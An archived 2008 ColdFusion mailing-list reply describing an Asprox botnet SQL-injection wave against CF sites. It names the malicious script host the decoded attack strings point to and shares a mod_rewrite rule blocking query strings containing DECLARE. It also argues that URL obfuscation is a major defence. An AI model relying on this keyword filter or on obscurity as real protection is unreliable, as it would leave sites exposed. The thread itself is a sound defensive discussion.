Ok... here's what appears to be hitting us: http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js. That is the Asprox botnet, which went through ASP sites a few months ago... looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF. Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become. In theory this should taper off as the botnet moves on to their next target. Looks like it's hitting sites such as houseandfusion and our site hardest, which each have zillions of pages indexed in Google (they botnet chooses target pages from Google searches). Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of CF servers, and as such we're likely going to be targeted hard in all manners of attacks in the future. Looks like a good lesson against CF sloppiness. p.s. we're up to 62000 attack attempts now in 5 hours. Still accelerating, but thankfully not exponential. Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working: RewriteCond %{QUERY_STRING} .*DECLARE.* RewriteRule ^(.*)$ violation.htm [nc,L] Interesting philosophical thought: I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the attacks significantly. It seems to me that such URL rewriting is actually a very important security tool, as we enter a period where botnets start targetting .cfm pages. I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks. Seems to me that it's a lot safer presenting your entire site as HTML to the outside world. Regards Terry --- On Fri, 8/8/08, Wil Genovese <[EMAIL PROTECTED]> wrote: > From: Wil Genovese <[EMAIL PROTECTED]> > Subject: Re: SQL injection attacks getting out of control > To: "CF-Linux" <[email protected]> > Date: Friday, August 8, 2008, 12:11 PM > what is your rewrite rule? I'm ok with mod-rewite, but > no expert > that's for sure. > > > Wil Genovese > > One man with courage makes a majority. > -Andrew Jackson > > A fine is a tax for doing wrong. A tax is a fine for doing > well. > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4433 Subscription: http://www.houseoffusion.com/groups/CF-Linux/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.14
